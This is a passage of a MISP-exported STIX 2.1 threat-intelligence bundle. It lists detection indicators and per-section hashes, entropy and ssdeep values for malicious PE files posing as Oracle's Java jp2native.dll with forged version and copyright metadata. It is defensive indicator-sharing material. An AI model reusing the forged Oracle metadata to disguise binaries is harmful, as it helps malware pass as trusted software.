YJvZO7dQSPdch13J0eHCjE6O4fjLQ6eLyDpXocCbY4ZRF2lDGiVApSjqEgkfqSOY7CfFZnGgfDnKLxyR/p9k
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-03T00:46:32Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--aec61910-1c29-47c5-88c9-37621ded62dd",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:09:07.000Z",
"modified": "2020-07-15T20:09:07.000Z",
"pattern": "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451982' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-15T23:22:28+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-07-15T20:09:07Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"pe\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--91bd79c2-d620-474e-9e81-52a3f7fe00d7",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:47.000Z",
"modified": "2020-08-02T18:50:47.000Z",
"pattern": "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:47Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"pe\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--2f0ff8d3-3e6b-4421-addd-6505f38211d2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:50:54.000Z",
"modified": "2020-08-02T18:50:54.000Z",
"pattern": "[file:extensions.'windows-pebinary-ext'.number_of_sections = '5' AND file:extensions.'windows-pebinary-ext'.pe_type = 'exe' AND file:extensions.'windows-pebinary-ext'.optional_header.address_of_entry_point = '268451313' AND file:extensions.'windows-pebinary-ext'.x_misp_compilation_timestamp = '2020-07-13T17:36:13+00:00' AND file:extensions.'windows-pebinary-ext'.x_misp_original_filename = 'jp2native.dll' AND file:extensions.'windows-pebinary-ext'.x_misp_internal_filename = 'jp2native' AND file:extensions.'windows-pebinary-ext'.x_misp_file_description = 'Java(TM) Platform SE binary' AND file:extensions.'windows-pebinary-ext'.x_misp_file_version = '11.172.2.11' AND file:extensions.'windows-pebinary-ext'.x_misp_lang_id = '040904e4' AND file:extensions.'windows-pebinary-ext'.x_misp_product_name = 'Java(TM) Platform SE 8 U172' AND file:extensions.'windows-pebinary-ext'.x_misp_product_version = '8.0.1720.11' AND file:extensions.'windows-pebinary-ext'.x_misp_company_name = 'Oracle Corporation' AND file:extensions.'windows-pebinary-ext'.x_misp_legal_copyright = 'Copyright \u00c2\u00a9 2018']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-08-02T18:50:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"pe\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\""
]
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--0537282b-b524-441b-bc04-7b894b342a40",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:00:03.000Z",
"modified": "2020-07-15T20:00:03.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdar",
"category": "Other",
"uuid": "3f9c0725-773e-43c0-804f-d684b03092c9"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "16384",
"category": "Other",
"uuid": "0b837526-f8e1-4bcd-8ecb-329f516930ae"
},
{
"type": "float",
"object_relation": "entropy",
"value": "6.5945206832312",
"category": "Other",
"uuid": "fbbaae3e-27eb-4cd8-99da-a6f55838909d"
},
{
"type": "md5",
"object_relation": "md5",
"value": "5963427cd562179e2c2225fa6e8bb5d5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "06c32bde-5608-47c4-a4fd-6ae4cc465b2e"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "5aea9aa2fbb76756ca7608fb2f0b50872cf9a919",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2b7f6066-6112-4600-8489-d0acf3c87394"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "0384f96cf8498309325a168041880d52e9624f023a620316a7e4ffb94a20be92",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e657a30a-27c8-466a-978b-459476309d8e"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "2d1f364720fa192a1cdd1ea3c9f5febce804f172929447f42dc66105fe9b5b65a06484dce3284bec79997ef4df3d6870aa86713d3305996bab4e7ccdd0fdbcac",
"category": "Payload delivery",
"to_ids": true,
"uuid": "bf8b548b-1636-44e5-a5ee-2301f3e296d8"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "192:bFGZboRzZ9QmDg//fOCVa/ott0dfwUVqFGN4W7OlKA8rof7/tpSEgxUajpiXjmIV:EB8ZvZbDdTTAf4owGI2Ee",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6c94b9e8-233a-42f8-8734-9537e202d765"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--856d2b05-2aaf-42c4-bd6a-cbfdd5329cf6",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:01:15.000Z",
"modified": "2020-07-15T20:01:15.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdata",
"category": "Other",
"uuid": "6cd4c038-ba0d-4603-ac3a-09673ea84425"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "118784",
"category": "Other",
"uuid": "b7f88d7f-93cc-4743-a1cd-170663465e33"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9827191322039",
"category": "Other",
"uuid": "61f2e657-07fc-4915-8b08-289f836cacda"
},
{
"type": "md5",
"object_relation": "md5",
"value": "edd63a0a668eb9c4231cdd5e0c81a044",
"category": "Payload delivery",
"to_ids": true,
"uuid": "401e2bf6-1ca8-4f40-acd8-9cb535d8309d"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "a1238d408a37574e5525d9b9a820398f4d7ef82a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "d7c0a094-afd8-4622-84d2-c18da9ff5c27"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "bfdb1a8c3324799ae08883d1298961f885a93ba5706f87a51f0434f847f4632a",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a1cfaabe-9bd2-4246-9e10-48dd45e63dc9"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "b8d20414f732017b2274a74cab74d109ebcb9ba7fbb5280f6bb33046994f1565a4ef0b928158fbc3e86a8b49dc4f00a1c1b30c01dfc89184f7f30acec5fb222c",
"category": "Payload delivery",
"to_ids": true,
"uuid": "7ded34a2-3ce7-41d7-832d-83a91f4eddc6"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "3072:KcjL2k0JYG5gBxUh54Ms7l+w87ESgNtY8pESR:f6hB5gBZ74XQN99R",
"category": "Payload delivery",
"to_ids": true,
"uuid": "304a3fab-c5d1-4867-97ca-0efcbab42b49"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--f5deb688-77b3-4f0b-b997-0692d1966239",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:02:26.000Z",
"modified": "2020-07-15T20:02:26.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".data",
"category": "Other",
"uuid": "8065b3ba-8707-4d21-b142-9ce4ca830386"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "69632",
"category": "Other",
"uuid": "b425d073-04ea-42b5-a609-c1e85546562d"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9479643160405",
"category": "Other",
"uuid": "6e7e11d3-86de-4136-bdbe-33cedbdafa36"
},
{
"type": "md5",
"object_relation": "md5",
"value": "6d3bca57196c0913e08a876821f385e0",
"category": "Payload delivery",
"to_ids": true,
"uuid": "efa13f3c-4693-4a33-b9b1-933aff8436ec"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "c67a629ab7662575eb6eac1c4e0a5daaffefdb15",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6866de3c-4f27-4faf-b4e9-2aec6ab16222"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "c5cb63c83c121d594c360584caf2a30fe7c5bed096d1abc5f9116e1e4f8113e0",
"category": "Payload delivery",
"to_ids": true,
"uuid": "71cb2ef1-4b3f-4c77-b912-7a78eefc8a1a"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "77143be8adb6e39cbdc21e8d9458d3fe6ffc36ebd9aa764e7b9e1e6e6e77eb6240fae09c2b321ea45dab580639b7766a1262b36499b0a75a90b81e0b55dae1ba",
"category": "Payload delivery",
"to_ids": true,
"uuid": "295f465b-62ea-43c6-8c60-41cf82e98820"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "1536:8lnx8E/msg8/rWJWVPRENX/HJSz+t95r49XAkr+it+a:gnxxgSrYGRQJSwrru",
"category": "Payload delivery",
"to_ids": true,
"uuid": "d5561dc5-6e15-4b06-9c39-5aff4909045c"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--30d4ea8b-bb35-4cc9-aa4d-b95f65834786",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:03:50.000Z",
"modified": "2020-07-15T20:03:50.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rsrc",
"category": "Other",
"uuid": "6bdc308a-64c9-4365-8af4-6fcecc71d572"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "27f5226b-29e3-4d36-814e-92917d4d555b"
},
{
"type": "float",
"object_relation": "entropy",
"value": "3.3548995614289",
"category": "Other",
"uuid": "fea91540-ab3a-41e2-87c5-dea257aede25"
},
{
"type": "md5",
"object_relation": "md5",
"value": "f3cf17707906ead98cbc9697b3b73c5f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "7c8a4b53-3bb3-4324-8756-6fe35a8cc64a"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "8c280ae153325f85cd4a869f8116e9e3df0dc812",
"category": "Payload delivery",
"to_ids": true,
"uuid": "62471cbc-61e2-45d1-aefa-6f9d3d4c243f"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "69aff97d63b9f106ab4b318358d260968629056e693f19f01e5001d023fb1f86",
"category": "Payload delivery",
"to_ids": true,
"uuid": "f352baed-150a-4ff4-8745-0c274900bf0a"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "6f52b4198600889d50961a88446854ab1e7dd877c2c91f2a39a3052b4059e2ff31ae6ac9a82d5777e4fe84d18598abcd0200b1f3e4449e34b9c1d191935d57b8",
"category": "Payload delivery",
"to_ids": true,
"uuid": "57726d99-3ff8-4331-9c22-fb9cc3c30762"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:E71i3nLfswYA9ps05tW01RaUGiqAlWxiN50EFH5Mg/Hrys4LkYnqq9/3JaCl/KPD:TA1YFSlel1NzHN/m93Jl/KPN3ND",
"category": "Payload delivery",
"to_ids": true,
"uuid": "26d752ad-7355-4070-8ccd-b09642a166c1"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--65b78289-00e3-405f-a669-e21c4b240aff",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-07-15T20:05:10.000Z",
"modified": "2020-07-15T20:05:10.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".reloc",
"category": "Other",
"uuid": "f3c0c1bf-c85a-4ba4-99a5-0373d70552cc"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "4096",
"category": "Other",
"uuid": "33f360e2-e3f4-4474-9fa2-fe385c72ac96"
},
{
"type": "float",
"object_relation": "entropy",
"value": "5.8403314710145",
"category": "Other",
"uuid": "965fd0bc-6b1c-418d-9c6a-419cb3ea8ad8"
},
{
"type": "md5",
"object_relation": "md5",
"value": "1b5b73978c9dd2b41ffb6503bbce8fa5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "68d5f823-7a9f-4c5e-9ee5-59326f0edc3e"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "8902587665c7be53c1803817feebd8982a1fce88",
"category": "Payload delivery",
"to_ids": true,
"uuid": "7d949797-4652-4952-837c-fdb19b0654d8"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "4de7524bab0b1ee28e73af784430877e43359840645dd5382d9387f758a710c1",
"category": "Payload delivery",
"to_ids": true,
"uuid": "de7fa0ae-9b23-466f-b477-e2061ffca952"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "c9c576f04fe09bfea4e965418cf08009a4f41f3d29529ece5827ebf6f66b1a879211ca4e7e8e046cde9238bb09ebba817dd5ec92f1442483ef613c062e6a79fa",
"category": "Payload delivery",
"to_ids": true,
"uuid": "13d0a6df-7d20-44c6-8289-475d62e967a6"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "12:/qtWjpmzSlZzY1zwkUdU0UX0rojXU84jv:/qkQ2lZzY1zwDCfjX3cv",
"category": "Payload delivery",
"to_ids": true,
"uuid": "60b6d300-9272-4596-a355-fd46e2f39e51"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--5e30f0a7-f2e0-4669-aadd-6ef0de574e31",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:39:23.000Z",
"modified": "2020-08-02T18:39:23.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdar",
"category": "Other",
"uuid": "e2ec184c-a31f-4ade-ae4c-642a7e65c614"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "12288",
"category": "Other",
"uuid": "a9d9c4fb-0f1b-4da7-b648-4b4076d6a949"
},
{
"type": "float",
"object_relation": "entropy",
"value": "6.6775358173282",
"category": "Other",
"uuid": "ba24c52b-8652-4f97-8f8a-eac7066f35da"
},
{
"type": "md5",
"object_relation": "md5",
"value": "942ccd316a0ee518903e4835680d1881",
"category": "Payload delivery",
"to_ids": true,
"uuid": "ff4673d1-baae-4215-97d6-98ea38fa85c8"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "2e960d47a58b00b89755ed2508b9f135ed2e8b0f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "20c7e874-c65d-43ce-9182-19767af29a96"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "3bb74816-35df-4e00-ac7b-27600b25cb8f"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2acebc68-ac24-4142-bb8b-2153327f78f1"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e28799f0-ca4d-4387-8d3e-cbf555c37642"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--b1dddcb3-12d4-4c3d-90f1-3b76ca3c2867",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:40:16.000Z",
"modified": "2020-08-02T18:40:16.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdar",
"category": "Other",
"uuid": "731fc26b-ca0f-4128-9341-4c50111efd41"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "12288",
"category": "Other",
"uuid": "de439331-8add-4208-b003-2d4d8e2150dd"
},
{
"type": "float",
"object_relation": "entropy",
"value": "6.6775358173282",
"category": "Other",
"uuid": "fd66d66c-ac27-4030-a798-a7e93b0a541a"
},
{
"type": "md5",
"object_relation": "md5",
"value": "942ccd316a0ee518903e4835680d1881",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a6b0963f-0575-4067-af56-b7058a2b5b99"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "2e960d47a58b00b89755ed2508b9f135ed2e8b0f",
"category": "Payload delivery",
"to_ids": true,
"uuid": "a33a4b9f-31ce-45ec-a5f9-47f1ffc98384"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "d37eb200b879977cc9d521c0e79f759e358eff1c8de745e19e4acd98f968abe5",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2ae21ea6-f77c-47dc-9c88-f7da7c38992d"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "49d5c3d54d723f6b6360c70f18e1ea62181a26ad05e47d73931651bb1447dab7cc6b6fabbfe7f1b7f127248221f948abe984879096276cd62d7f176b5eb74841",
"category": "Payload delivery",
"to_ids": true,
"uuid": "9fbefbb9-f09a-4010-a067-9088c46604f1"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "192:csV5kuYL8L9ROTkx5Ih8pbtaSzCbBJ0zHrDy0tD44KRt26LLYRdTuY:pyFq9I+5Ih8pcSGbBJgnFtkdfC3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "4e4b35a9-f9fc-4fb9-9833-75c2b261c0d9"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--cda02ce6-6495-448b-a881-94dd8b6ea251",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:40:23.000Z",
"modified": "2020-08-02T18:40:23.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdata",
"category": "Other",
"uuid": "7bf0f1c8-9605-4195-a8b3-6e6ea32eade6"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "118784",
"category": "Other",
"uuid": "bc1cbecc-7502-43c0-b231-5802452feee3"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9900939465467",
"category": "Other",
"uuid": "141fcc00-e7da-40f0-ab02-d471bad2c443"
},
{
"type": "md5",
"object_relation": "md5",
"value": "55969439752184b954d17e57a02ead13",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e1fb44e1-479d-4e34-87d2-f3ba9ec79ecd"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "630de8954270ef5ac062e63d1f0a357bf27c59e3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "680dee4f-fbb9-4410-ab4c-6298a791bb19"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705",
"category": "Payload delivery",
"to_ids": true,
"uuid": "81470ab2-aff0-425a-97ad-55f1b4896bb9"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc",
"category": "Payload delivery",
"to_ids": true,
"uuid": "f2f20b2d-cb5c-4781-b3c5-c7fdde33fde3"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6",
"category": "Payload delivery",
"to_ids": true,
"uuid": "6e091a0c-0855-40f7-add2-6c80515b795f"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--2b213ae5-83b6-4e62-b2e9-bb58a3375ef2",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:41:25.000Z",
"modified": "2020-08-02T18:41:25.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".rdata",
"category": "Other",
"uuid": "a1c86d9f-897f-48a9-a8c5-327bce630d35"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "118784",
"category": "Other",
"uuid": "10e6d201-dd9b-45ee-aaf8-4d1d3c0df088"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.9900939465467",
"category": "Other",
"uuid": "4e70dba5-9b88-4a31-9711-54b25fdecaea"
},
{
"type": "md5",
"object_relation": "md5",
"value": "55969439752184b954d17e57a02ead13",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5633014a-2883-4ad0-8ac8-609587d28d3a"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "630de8954270ef5ac062e63d1f0a357bf27c59e3",
"category": "Payload delivery",
"to_ids": true,
"uuid": "0b9dc2cf-1584-45b6-a6e3-652b330875b6"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "93f72412919f3d0ce53152244f64e558ba5e094db5af788e14fc9e057bddb705",
"category": "Payload delivery",
"to_ids": true,
"uuid": "e4a7253c-94bd-487d-a995-d65988be8b06"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "1c7aee1757dee98b1cf9f0b91a0cc071b06aad64d2bd93d686079f64c35c473f28066cf1b24e93b53955075103c4759d8b2c28dfb24118f2f5eeeeaa6408c8fc",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5fc5c62c-d808-427f-b7fc-8ce4776bf62e"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "3072:R+wkQzOkYHYAl6+K6BGiTcp1N3zWz6z+3Gy98+5G6:RJkuYHxK6BGiK1kz6q3Gy+2G6",
"category": "Payload delivery",
"to_ids": true,
"uuid": "ed4b4255-a9ce-4c32-8ed6-259f5059c932"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--3a117e2f-ba72-4253-aae3-e47373b3b29f",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:41:47.000Z",
"modified": "2020-08-02T18:41:47.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".data",
"category": "Other",
"uuid": "2ab03bf0-15e4-4eb2-af30-92242bf54ffb"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "69632",
"category": "Other",
"uuid": "000942ea-74e1-43dd-959b-066f96704a0f"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.8568053112406",
"category": "Other",
"uuid": "97ca357e-b6b9-46c8-b15a-6008a5b3208b"
},
{
"type": "md5",
"object_relation": "md5",
"value": "c59b7c6bdf6d3b6475e830d444c16279",
"category": "Payload delivery",
"to_ids": true,
"uuid": "017f1fee-7052-44ab-a44e-fef1ea8029a6"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "4228bd6f4751581bcd745a808244e531568aba61",
"category": "Payload delivery",
"to_ids": true,
"uuid": "2276cac0-c9a4-4267-b95d-da9ead48dd8a"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717",
"category": "Payload delivery",
"to_ids": true,
"uuid": "8142c5b2-a53b-4128-98e8-ea2ba4436b4c"
},
{
"type": "sha512",
"object_relation": "sha512",
"value": "2142d7976cd54482c184e4e022fd22431829450dd7429e6f50ee97fc36f75ca284dc0c5d19c9bf25199afff4a9764013240b7a69dd2f3f0f32746363e89ba20b",
"category": "Payload delivery",
"to_ids": true,
"uuid": "fec67a7c-092d-4a82-b7eb-064c8bca18d9"
},
{
"type": "ssdeep",
"object_relation": "ssdeep",
"value": "1536:rzLybGpQ1aURuDvZh8/cODJtX00PIpwkfkNHkLFYz9AHJxOV:byv1aUo8/cONqbwkfwWuzSpxY",
"category": "Payload delivery",
"to_ids": true,
"uuid": "5f0ed13d-ba7c-460f-83bc-03d21be6ef6e"
}
],
"x_misp_meta_category": "file",
"x_misp_name": "pe-section"
},
{
"type": "x-misp-object",
"spec_version": "2.1",
"id": "x-misp-object--78fb4f68-a212-4ba1-af11-4943011c012c",
"created_by_ref": "identity--5e9e5d86-5b94-4ff6-b07e-4e3e950d210f",
"created": "2020-08-02T18:43:00.000Z",
"modified": "2020-08-02T18:43:00.000Z",
"labels": [
"misp:name=\"pe-section\"",
"misp:meta-category=\"file\""
],
"x_misp_attributes": [
{
"type": "text",
"object_relation": "name",
"value": ".data",
"category": "Other",
"uuid": "ee88ca61-1273-40df-b15e-7c1cef7a5422"
},
{
"type": "size-in-bytes",
"object_relation": "size-in-bytes",
"value": "69632",
"category": "Other",
"uuid": "ae6080f0-382a-4d2e-b54b-78bbbfd6db95"
},
{
"type": "float",
"object_relation": "entropy",
"value": "7.8568053112406",
"category": "Other",
"uuid": "8f146a4a-41de-41f6-bae9-4a6a1f266488"
},
{
"type": "md5",
"object_relation": "md5",
"value": "c59b7c6bdf6d3b6475e830d444c16279",
"category": "Payload delivery",
"to_ids": true,
"uuid": "be5d5eba-b42b-4d77-88c9-200eee1782a3"
},
{
"type": "sha1",
"object_relation": "sha1",
"value": "4228bd6f4751581bcd745a808244e531568aba61",
"category": "Payload delivery",
"to_ids": true,
"uuid": "28495c52-a066-4c3e-9c80-e4c498da2333"
},
{
"type": "sha256",
"object_relation": "sha256",
"value": "34dc4e6d66d1836458c99598e7d71ee34485361eaec6f64bd7044e8555f32717",
"category": "Payload delivery",
"to_ids": true,
